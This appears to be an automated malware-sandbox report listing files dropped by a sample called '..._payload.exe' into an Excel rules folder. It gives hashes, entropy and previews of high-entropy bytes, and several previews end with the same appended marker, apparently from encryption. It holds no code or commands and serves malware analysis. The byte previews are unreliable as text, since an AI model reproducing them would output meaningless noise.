                                                                                                                                                                      Preview:<?xml7......1...@.E*e..'...A...n..r.....F....:........-...hN...J[..^Vf...%...B[r. p..p.\%..:...V.g.g)l.W..N...w....g.m...R..-$.4.3.R.".W........{-3.B..&/.%.D(.....k(..:....w.H..Af..xdzt..Ls..M.i.l...Qi..........*Lw...........R.z....V.{../.r..D.@Kf7.L5.#E .ifl.{.cO.m.#.....Lg]{.#3........Dh 4...h+.......C...GH.%...t....+.....<.f......&..`.z^FS9.i...<.K.Nye.L.k.,H..Zr.e...Vc.........}#!#...`t.4...7...|gB...z.k.fZ...x.....R(.....]f.A2s.....A...v9$.7....N.fi...?.j......{BI...'J.....L.y.L..?......z..'fDI;.....f/..k..6.V..t>.x/....(uR......]e...dKZ_."..>M.....7..>..\..R......z..~m@a.6.X..-S....Iv.N.7DS..o....'@1.......p.L.....oD4q.s.e..8~..F.p......]...F..O...D.....c`.J..I.(h..E.....P:.A[pS.........;.o...=K'...JX.m.H../Z+...).sl.......Ce..4...hF..8O....:Di..f!.&=..:....W..@..m.%...D..p-x.#.N.t^...z.*.`.r..-j..Y6.....#.....B.k.jiw....'Cx...~.C<.]W..x.1...Q....H<.o....k...B......./..,...+....7.u.^;|.^'.1.3H0...z..Y........>.jb...#.1.K...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500022v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                      Entropy (8bit):7.779963367221796
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cvMkZwceUOuJEb5jXNgOQph2DgraaVsPx7e2bD:GMkZwcJEBBQph3raaEx5D
                                                                                                                                                                      MD5:2B024813115057722B0448C7796F841B
                                                                                                                                                                      SHA1:64A9D11AA403B979B33A53DDCD10405655BE96B5
                                                                                                                                                                      SHA-256:E04869D64C067C7B6EE91C069D59D2C301096D4446E383BDD3A3A873DB87CCFF
                                                                                                                                                                      SHA-512:9B5A80C941341CF9CAE80190C4B87E5E31DCCBD71A37E544A1291BCC90F1DD02809467319C9F8E8925209606F74678656535A6B8A53B9172C2A721C94E13261A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..R..a...*.b.........S.&M.M.}..ml.4.1....[...A....V9..C*(...........Ri+z...y.v....e.k.r ...... .=pn...*... (Aw..M 2.s.nq.`......-.7.Zg. ...[..|.....P\F.l..........I"i."{......$&9|.a$:..9.,.h...T.W.0.lT.G.B..q-.....M|$...OV...]..%.1t..|*gL..XE.d...w..&:...6]..d...(.l......U..x.'....l....*..3.W.XzR...Q..*2Z.W....bN.....|m..5}..........<.{.B.>..I^.2.`..iw..^9...o..[u...._..u....U...q.\.1tm...V>].....vT......1..hk........X... ,.j.L.'!<O(...(8.../U.]......U..>.<.G.....z..B...{....8.m.,....6U...\..MZ.."......$.{1..a....DM.F.......:.g<.j.Y..%Q.h*./.Q.Zbiq..%.}U.Z..X...&........Z..:...)nW.bT."C%E.R.....}...v.U.g.r.{W.Yy.....H......g.I.M.J..W..d.9..X.....2]..C..G .**.g;....B.m.U.h....DJq..6O.i..j.Y.b..1SC.T..4$.u8.E~....\./.M.... p....QY'.:khA=..V.;....1.....&[.b...#:.(.M.d<.".:~o..k.Yg...gv1B..U.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500023v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):969
                                                                                                                                                                      Entropy (8bit):7.758591190643281
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6w8GkR8ihXiu4c/UlygojwQy1dBtJzIkY6kg22bD:6NRBXiu4c/UlybwQyTBj0kY6x9D
                                                                                                                                                                      MD5:4C56F57358EA931F7A43357707CEF70A
                                                                                                                                                                      SHA1:D2DBF2F8F5D56D510F5685CBDBA38232DE31C06F
                                                                                                                                                                      SHA-256:B3486F8A8C455E74125898E6021BF2A24795A7C3A40E4CF1628D45AE978B9FAE
                                                                                                                                                                      SHA-512:4A0376857861ADD34BBC6FD36F84F3A2C0234B2E99A21FB28A5201595F7A3B1EF287105E81DDE9A64D1C6EB6E849067AE36B36476EDC7CFB134CB229C30382AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.".tY.....^.d...U..`..N....K...I.N..{..t`+s....DD..d..t=da.~..O...s#...y..:|i..uj.l.......fD.vi.l.#T.*.n..]..Y..#gs.f.*<.........@....w.".(...)Ob.l(.Kg.q.f[....^v@.....].Gn<.8....,J.yW....i..=..C->.r.;..z_.@.zx.7-......^Y.vx!?.....Z+.f...y../.....k....o*;....m;8z..L.8..BD$.5..X...2.@.p..;I...a..L..............2..{...zT.JPi.!9..M........U.....6..P.I\O(....lS....X.9...-.[..u.=.E.`....X..b....H.>P..e..cb..i........c.?q>.U...S}..R.s<K$....V..V.........'..d.|.E"W....#go.....X.Mn.b..d... .O..!((.U<.......[^_.......).$.S5...i...S..v...z..t.q@..u_.... .e+{Vx_....}k....u...w9R]....E<cr%.|N...].N......X7%h.j...n.J.,K.3...p)...\.b........z.k...i]....k}..aP.r....gt.| .C.....++..C...k.RW.#:}2........X..FJ.1....|[...ApO..L!.$......f......|..9.Vehk..Z....#..;...<E/..mpv4...|...A.......m.).....2C.4.[...V..:0=i..bx.e.f.=7>...X.I..v.E...Q.~E.V[;.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500024v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1467
                                                                                                                                                                      Entropy (8bit):7.851620629114454
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:tdf+sd1SjMX0/XW/k5Q3VwIx0hgzk3WSrd8S+eWQxHzVf3UnxSRH/pGP2bD:th+sd1M5v+mIyhgQ3WY+hiUUppGsD
                                                                                                                                                                      MD5:C6B05BF6CF79BC744196D172F5930B6E
                                                                                                                                                                      SHA1:2110EA04A6B2B165CE2FA77537D548841C857894
                                                                                                                                                                      SHA-256:C1D8727E41E4F02531E21F67C3C2F03388AFE3C9E8769FE9122CAFD39B224460
                                                                                                                                                                      SHA-512:7BAB4721A5E14F7A7F1F9D5D67763C4E10632A427D0834BD653C1E0B1FAB58AAC2506827CC858C89517446550EB98163BF70358EA7E9ABF6846E4778499D00E4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlv`....<._...7.m2!.]<.'.O.3xA...4......\9.JG.....`...M.K......3..{..d..,b.OF.vR.m...<..y9..M]..|.LS....?.{.)....[v.U...;.V.%.98.s..AT.F@.{q.Z....H.....is..Z.....2....)s.I...}@...x...@.Z{xXe....%,P<..<B..ZaUd..:./.9qhm....").y..5..:s..w....vHL.(.>]...J Y..R....Y.]&5.^.9..|...h.u.$/l.....6..'.....A.....9q.;Y.T.";....v..9.../.3b.pa.>Z.I....6R.J.......?...}H2-.'.$D8.K..7...|..M3.Aua..I..Z.]...Jy.D..JX.uq. ....<Pm..7.....M.........g.$<....Y....[)g\.m ..,...K.C.!./e..M)Z](p.9...J".3.GH.3\Z;._.d...H..g....w...P.t..D..6..L..5y.[ufT.CkbO-..).j..j14..R...^.8..?....d...L...}..B.....'.^.BQ.......%.tp...9....15.k.....k]..j.M.....3....`.x`C....9.f..C^......$j...r7...A.:NzZVOK=.nZ.3.3.wx...:3.O.!..R...d.Y......v..r?^..K.....M.....%.7r.....(?;.:X...x.7.F.S..Q@.}+.g.8.^...Z.&..U.w.N...z.....'...l.....+.........n.'.I.Ko/t.a.P.,oJ.B"!.m......`...=2<}5.D.w.......A.h..w ..*C^.....y...".b..... .Z.y.$."......Hc...a...i#..].W..}..7.....l..7.D.EU.>@:....n..V...a.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510000v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1397
                                                                                                                                                                      Entropy (8bit):7.830338359124453
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bYK3j8Sc1M8WckeckbqpLDFku6op2WL60bgSeZYiqugfxRGbV6ipV2bD:UKYScygkRm6Zk4pD6OteZYiq1rkpuD
                                                                                                                                                                      MD5:983A0B726E4FD4A1C3E62FBF707E780A
                                                                                                                                                                      SHA1:4560C39A424F540DA2A5BB7C28A9717413535A08
                                                                                                                                                                      SHA-256:71ABBEE9122388AF62B79D37609628E559002476EF4C4CA3782BFAA167CD963F
                                                                                                                                                                      SHA-512:097293602DEF8B1EB61A3599BF3B07C21EB88E07E1C6D8C3F736020456D16349337D0521205106B4C7AAFF1CA14677392116A188D0BE76F862081E0A00A728C3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml;.Q...q..I.1.5..]..r.oU6/S.?..jy...p....,....M.S........E0....]qz...6.-..it./!..Q!...*m..-..k.22.\.G....b.<L.Y0tNQ..V>5C.uF......< .n..,....;...t.o}.>9....i.T.Zn....U.3..$r...B3l....m.u...9B.`.a. (.}....\w..=. R.n.V.....bt{S.m1)....|...L..er...8.......CRaC.....j..&.#.....WL].RF..6.+......[.f.$W..%#N.B?.x.. ....x......+.U|L........VO..T.Y..1.....m"e.x..y...S.8...........2.F.p.9....-Hg.%Z.1:...+X.A.d........*.{>.(U\Q....K0.*K....gU..B.......H....q+..}<<.v...YX."%.W...$...e.Kt.v.r.c/FQ.W..Y..,|.(,9\.. ...x.?...e.._.?...>f.?...V..=.....>/..Ak..6....$.(>n3....tV ..O.f..eg..,..Y4....V..... .S....i.... .l.X....1.....2!*..|Lh.wk....[.8U.Yjh*.g/..[I.;_.K9..m.........U-.t..]>.CS$L<%...#.....R".UDH..E..3..........t.t.j...{.t.wF.hY.....(......d......O....}.7...*$.r..|....Y..^..-.4j~....6U..jyx....Ln......s.".|..}.<....#._g+.N.......awU.Iy.F<.K.[...v_rd...a .5.......(,R.e}......`j=...g.w9;LJ....u..y)-..')|..1iN.....6d[.:.-.k-<.L.~PQ..C.'...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510005v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1269
                                                                                                                                                                      Entropy (8bit):7.832833822084669
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:oQms85Suf2QxhZ/vnQE0/LlMOU2IVZ6ROLYrwQnO3JGOBteZ2bD:Va4uf2eznQXrU2a6UL/6YgOzeyD
                                                                                                                                                                      MD5:733142DF75E6C87BC3CADA9E1888EC31
                                                                                                                                                                      SHA1:C8D92EF5CF5FCC5C5EEB0D38132BA2CC7EBC84EC
                                                                                                                                                                      SHA-256:6E4156994D7C6817B1D3DB4E3BBF5DD329F869A9BDF3ED3B399A76D89214272E
                                                                                                                                                                      SHA-512:63D54C4D364670AA30AABB26F5EE563316C546BD62A0541F7B71A2A2B60DAFE3609A739206FB6BE29940840F665873630771AF8C905D7C65CC284D6CB81859C3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml\.-..]"...e...%..lV!r!?...Q.*F..x1.Q.......I...~<....#F. w.5+D,..v....(......Ia)D..E.M.Y.....c.7G......S.9.....w.U*..Cb}u!..e.}.g.....Ay.6.!.F.].dl/..Y.=.L...*.}.W..l)w.t....o?S..V..!........b.+.f...^..6dvS.'y>...Pgj'KUV.c..].....N..`Yk...E.Ff-..X......(.z...-kw.Z..).....~5.:?.)....5z..M.p.L><..TR..R..#./.G.t.{Q.w....c..u.m....;...(..nE.E'.sn..... ...r../R_^s.G..^O..'s....[@....eIq....V.%..6XW.X.....v.M.$..B(...2.........../....wKwqc"K......`.....l.|'.+..<....!.f./VL...do?.n..*t,a6..P...6.TS.n~.\4..:...r[......3.V1v../..../..9.vx........~..Y..z.n2..."...[.."4Q!.h.31..x=f...o....!c?E^G.z#.......H......1G._2.3...Jj.U8..._..R........2.ls...-(.B./....x.}#.QT.b..S3R...}.yV......1...?Q.....W....m..o.......&......R.F....=,.7Rv.<.l....2..~..W.Z...Ef.=p...H./..#J..v.>....j.tq..f.....K0..1...FU.x......N...l.0Z.N.K.-..g.U....^. s... .hKP.]E.....Ae,..>..g8=...LP...N>7..6....Q...NF..~.I.#F.{`..?..B.K...m..d.......~F.....>.>7...|.&..?!.j.x....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510006v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1088
                                                                                                                                                                      Entropy (8bit):7.80359136475614
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:O/6wOEfTizU2RZl/sZ/vhPMscfhkNyxT3UYRN4L4Z56cx2bD:ObvfTizU2qZGscfhkgxTEYRN4L4hKD
                                                                                                                                                                      MD5:B1CFB6D616F55AFFB8890BD286DBB432
                                                                                                                                                                      SHA1:85B63FB06DBF37616EB17015CEBA0B90648CD6AE
                                                                                                                                                                      SHA-256:2C0DD95A2730B8AE3396172BA9216817BA13565F7EE8644F17CB9366C8AD8E29
                                                                                                                                                                      SHA-512:E07F0D6734AC3BDE6799788BCA62D1CA20A23C0D0EDC929C970DF8BBD20C4AC0B9AA9E87CA9F0D25D48162001BA8CF289DCD5745DFE0D32A26961A7BE48343EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...u.. ..@.x...vs...*..gf.......8.I.5...M1..G....E3@5.qw_....c..r........0.NZ..)....4?.c.B.3.u..y-....D.qf....0f....\.....@5.....$.-....1.....A...P<6..O..#..Yh...%c..+U2..Ve..5.V.}..c;.W.k.g..v....l.a...E.........yilx.1..E...=pJ..S...m.o.......[.+.:cF...66F..7..&z;.I1....]7.J......2{.Z".3@P6.J.q..j/TG._....~~....C.-{S...1pE.C...H.&.$.,..qND`...A..3...\5(.}.9..]f.t.......pv.........7.'O..3...j.o.......G]..x4....:..$...+..e.%H........Q. ..C........un...:.!...@..I.4]...TC..A....i....1s..r...2.#.TC.6...D.....|>....S<.C..........y.@C...y....W.]9c...}...yN).9.=..........F...H......v1..-,:.....H?.j.1`..|(.t...}.$%..K....$.I.\R...&.........?.n..=.`^.8......G.v..U.Q.(.fNq...R..N.$p......f... eS#..1...!.c...""..e......5....!.yE_...].F_....s..@gF......xk...k.c.)....U>...|q..x.k5s(...?Z..d...b.. .Pn.,..l...........dq....-.>..y..*.._aQ..g+.q?Li:Z.JHP~.n...G...9..|.T.......?.k...R..G4..g...m...>...fG.y..]0?n2..d.....3.u!..>.)].+..., .L.r.w..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510008v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1100
                                                                                                                                                                      Entropy (8bit):7.803201868503145
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:y2iFcE13Ts++hxfWUc/dO22YEkBnKec5RoQXtii5kYtclng0o2bD:y2bQ3QPKUcE22YEk1KLIi5bovbD
                                                                                                                                                                      MD5:18DEDD52C4B221FE8A556C20108FC1C5
                                                                                                                                                                      SHA1:71822E7A251A62858F564262168107B05B3D9431
                                                                                                                                                                      SHA-256:8CF02C9B2B3A305CEF0495E0CA26A897C92565ECDD53AB620897016A875C74F0
                                                                                                                                                                      SHA-512:B8609A7A625B002050B31C64F45B0359F20834742138086A464DEA7960D78D9C383039BE60A5E8D831B3BBAB73860037BDE5F3250213309510BC803E0BF99445
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....K..x]...G0.I..,.. :..Cl...q...#.Q8.....d...c..6....)i.:|...U...8..JQ.q.......1.(......s-. p.QG..D.Kn....q.O....L.T.x.=.@....E..vN...,....c@.8.../.w.J....m..Ag3...w...@e(.....,..v..7..Q.R..~~.H9.2....}....s...ZN....'.rTQo..6.lJ"ED.....TgvY.S..GgO..nA.({..6...n.H.......k..O......Y.."......../.L..,...OrPn...z......-<.x.e....H.zV.{..lu.Mxh.4.-!`...d...E;T...R.1..*+g..+s..Gz...xE...0``7..}.....l.J.i,S|;..<.8z.\e.6`......O.}5+*+.........^....4U..L....../K.....>...aG.I..TuY. ...^Kr....d'.Q.W..w.D.+#3 ...[.G.....O.UW<.rp..........~=...r.s.7..+.9tn?.!!....p.....K.5.....f\1..h0~..H...F...g...c#j....Z.T.<....9B.)...r...$....3......1l.V=...{.OJ..t.k.r...f\0.....n\D..~0....)Q.........'..........o..%..>.q....@......t..(*.....vb>...w..`.D..$sR.sH.A.H...&m`*}......T.4....(.1. .8...i*HyVy?T..xYQ.Q5..BRr.bH9RU]...T........F..uO.....6f.we7.i....My..w..5>2.q"......@.84.#..D.s.....#dF ...@..........E....o..*..V<6...u......t....&.3....).F..A".?i.:.2U..E.f...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510009v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1192
                                                                                                                                                                      Entropy (8bit):7.824007091646689
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gKaUMYXTPM6rHVTuE2PqIaC2G9A9AvWdhdzEOO2xSo2bD:gKaU9XTUWWihCPWC+NzRO3bD
                                                                                                                                                                      MD5:E6444117639AEE7ADBBA746224E4CF05
                                                                                                                                                                      SHA1:EA10F6F7507680CEECA5BB82A82A769A7A9DE764
                                                                                                                                                                      SHA-256:E3CC567A512EEB01D04B1439C80792AF8E80CD61000BCDD94E2B74BA2A0224AD
                                                                                                                                                                      SHA-512:A0853D5A1719F482C3B5038EB284B3F6A7F31B46AA6DA899F76CD6629D0461450F6E194C7A0BC499D1397ECCCDAC7008885FDABD1E61EAE5D7ED9280D8DD5529
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml].R.../.R..n<..dW..G..$ <......}...... ........^.f.o\&\l.Z..?b|..{nBW1h.E....-.*.....\...8z`.~...!.,'!..25.....X.}.dI.IH.x.,.HsD.o......j....b.....{D.........)vhl8......:S...H..z...K.....a.8..'W....IaV.$S.~.[hl%T,.(.E..bmO....\g.U..{,.....Y......^.V?...vP.....FK.n.+..=...Y....=.E.!....0.[.c...,.wX.-x...o...I..K.."f#....m.].y..;.wF.}....|....A..]K..G..:9d.L./j.............nx.....z...>a......~..]| ........O[...G.e..t..1)\j.4k.bw....J...!.'v.&F.Z...+..%n.......`.q.....`..L.7Hp...R.+..."....M.y1...DAm.-.....:Bh.#....W.......4C......2Uv...P\<@..}S..'... ...50v..Q..Kp..Z.s.P. sIE&../..{....X.........(eq#.......n>.q..I,.L{.-"..$.C.....l..+`...+..P.P...Ug..+..4.".O.f.'W.D}..;6VEE..2..E..\....}.m?l.)Z{..[..2..O..&%....&....-..o[..K...1@....<.qy...a...X).Bm.X....#;....>..Z..n......g....q]d...ek.L.2x..mB.&.$.l.#d6`..X...~..u...z..G.g..J..y.W*9.B>.......N.2.F....gj.k!.rF...36.......LF`..H..A.....:1.4\~..i{..s.j.UU.=..F%..{.%.s.0.o..HN.!..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510010v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                      Entropy (8bit):7.808490989006949
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:0c1SxqQajD7ir2lDhIVM/QsN/HU/4T4Rh2bD:Ltjnir/WnN/0/vR6D
                                                                                                                                                                      MD5:13C3761B26CC5164E5A160FBB9CF9E96
                                                                                                                                                                      SHA1:40CB51E1027E41B78080E628F92A3E8DCF4CC3BD
                                                                                                                                                                      SHA-256:8E227C54AE366079B7C96E45A75322500D1B241B15ED8F30CA968B56038ED9F5
                                                                                                                                                                      SHA-512:8D69CBF4C87D47C4CD9E5797B25A27A2646C6CD2D3CC65E6D790078881CEA004A6F717B3742887E8392514E62C1AED487697DDC7899E7D2B23C689706BA7732B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..{/>.#!..7Z...c..~2.8N..].v.7.....y^...\[.).u...t........[...S...[%..j.]$cu...E.=.....,.jh7..St.xKF...+...........8.M.....0..]tc...56.....~....g.....:].....v..(.n+..!.+...y@....8.M.%..na.._A.Y.0...iJ.........V...2..Q....c..g......_.......Cj.c../../.A..i.....$.........Y2..]2...|.]x[..Rx0C/....,..N..@(..gs....s..........0x EDw...sA...k....D.I.-\..;...v?.ZTE.r..m....]~.rj..LX...Ta?.....!....8E..D?.=...^L.. .8.E..X...g..bih.y.8.q.M..e..sh......a..D}...-.....(CNd.c.'....\(.*.Q...k*"Z.0.Y!{$i..9y.r...w.#SC.].].p...@......sEu.$.dZ.9l.C.....7.?je..@@......O&.0E/.....TOg........#w.nd'..<.1.As3..+..$..|Q.D..|.w...N.q....=.o.n%.e....e.V.T...xU.z...2v...TW....Z.V.`.rxr.Qb...j....:._..z..0.ebH......"3..B..S')[......3u...(...*~R.gI..J.a.l.Z./...b.Ss..x..2>. Yr.15...jp9..K.q5J...{..}...f..X......|.......U2........U...t.S...2.+dym.<..(.s.t.*....+....ct.) p..0..q.4.4...Q...}...08a..G`Lb.U....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510012v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3884
                                                                                                                                                                      Entropy (8bit):7.945779414797958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:QliNaIN7IU9OiybhWI2uzkR4PyFFkixM1uyK:QliwIN75zshBzEopxq
                                                                                                                                                                      MD5:6942DC3782C9DE968118A634CA456C98
                                                                                                                                                                      SHA1:433E10B2999E62E78BE0425EF45E03805A3F72BE
                                                                                                                                                                      SHA-256:9329C92F7B356BF031CCA4F2C06E5BD655CE24DDEBFD3344EB96D618613784B8
                                                                                                                                                                      SHA-512:9C0FD2BA7D0F5F9F2C08F64A039D70BEF1D5452572889BDB6E4457BEC90ACC2262D9F5839BEFB945C366795CD3BDF3072A60D3B4CC5E7AE2AF5728B9DD0B5DD5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml,.fO.$^.Xj...I.&...XA...R..;...m.v.q.R o..<K.;..>._..Aq`S,%zH.9eV,X^k..G.J..E.....\]-.)p.....j;...0.{LjB.Z..l!,.%v..R....,....y...yO..Y.m.C....+.H.....e.....lp9j./*.r....Y?... A}..<...@..'.F<w{}.Ku]Rw@5x.(...%.~x...\.'...:P....n..u4"_..L..l.7D.xW...z.Oa.AO..W..........o`....K....C.-.)+%..K...[.GRv..C`j.......Y...y].Y.0...g......D.F9;..w?..30.g...%q{VY..}...E.jO....N.w.z...\./r"JT@.WQ..O}.=.2..Z..0"..QAl@....Y...3:l"(.Q...c..$I.#.H!.(.M.0...:\u.._...\..d........a...L..:rlXJ.6p2aA.R..#.v... bj \D0.....(z...#V...L.[...7....e.G.......b.....i..3....*^ad..T.$...t....}....9H..9a....&.'......H.up.ASM.6......:..[4......oXVz...)..q....)X.H]..fm...5N..$....Q..!.m..;../.`.P6...B.,3....;.Eq...p..yt.l.QL+^.-w.....!.........N.6.fs.m.s..V+RR-UR...c......)..B.._El.M./l.AF....2A.......S$.?:4<a[...._C....#i."9.1..Y...E..gr...7...H0....Fz....6%..q.-.._.m^.X....#r...F=.......R...RkBq.*.h...l......h.s].m.."n&9.0;.....U.oh.......*.`$..bR..V:..]..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510015v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):790
                                                                                                                                                                      Entropy (8bit):7.73420311556793
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:oI9cBvA8LddsYOqZhBoZGY7p6UAaT8JOS2Ynbf2bD:o6848LddJX/BC4U9T8MS/ngD
                                                                                                                                                                      MD5:E51569E2D7510FC68A4D76B552081404
                                                                                                                                                                      SHA1:F49CC2085C2149C8188A4A555AA9CF68FF6BA5B4
                                                                                                                                                                      SHA-256:192130FC2C9789183D41C769DBAB55DFE8E08CAD9CF6934B2D4A6131BA8DA6CD
                                                                                                                                                                      SHA-512:3DA71CE56339CE1F02F97A1EE39741611F68F8A316AF9ED3C2E77532B3D810CFAE89ABC1469B08D3D5B6DFE044456ADD7D8E1D31B6996E82451DEA6861143B57
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlI..L.E..h .H.).5....nD|K.BvO`...t...@6.M..R6w..IU.n......9...0.{....+A.5.....|.V..9......`?CTL^..A...~/...%x..C...... .........N...U.zt.....s|..FDK...>7'..(.w.......]tx@.#..B.....D._..f..hb.qz....}}.D.....kh.V4.'._.C..JQW7...R..`..6}..:]..Ws..|E`].D.a.dc......@.{.......{.+.*-P.....W.\...J@....N..>....A.kA....U....B...8.=.....C..HVw.~.M.d..B...;...u"...#.U..0.Sc.5(.=..B..9.V5.7.9Y..'G.p......cZ4F....,..giQi.hx...K...O,...5`Si.1.3y..E.......g..@..D.1.\>./R...sm....&.i...~.....v..x..-fs..T.l.IN..v....p#._.XA.n....c.yL..#.......2<(....d.1g...v.1e.2@..........q..}@.....'.5c..KB....F.$mQ...q....OH..".J..)..p.C^.....H$~.[.0..\..8...^+.......f..Q....lQ.*.8..xEW1......y.,..C+mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510016v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3934
                                                                                                                                                                      Entropy (8bit):7.963675675801448
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:L0PYTNmMjM0K39jRL6Sga+fziydYM93202TIRQ6dAaOAHJcxDX:LoYIMBKBRL6o3rM9G02kWOFuxX
                                                                                                                                                                      MD5:C0A3ABF5F2A818DE81C2D7E28E66A0EB
                                                                                                                                                                      SHA1:38A5B2FD89D9EFB55571A9C969E2D9E008685485
                                                                                                                                                                      SHA-256:3926DACC04F817A6794F7702DCB030DE276159D07FDDEEC862DB9CBF4B3D3044
                                                                                                                                                                      SHA-512:10A15E72042DF43815A4DB6EE6C5D7C001D35166C96785B3F3817FBE773EBAFA3D15A0CB1B7CF9AFDD25F82877B387FF2926D9AD17DD159A3DB771773CD3FF1F
                                                                                                                                                                      Malicious:false
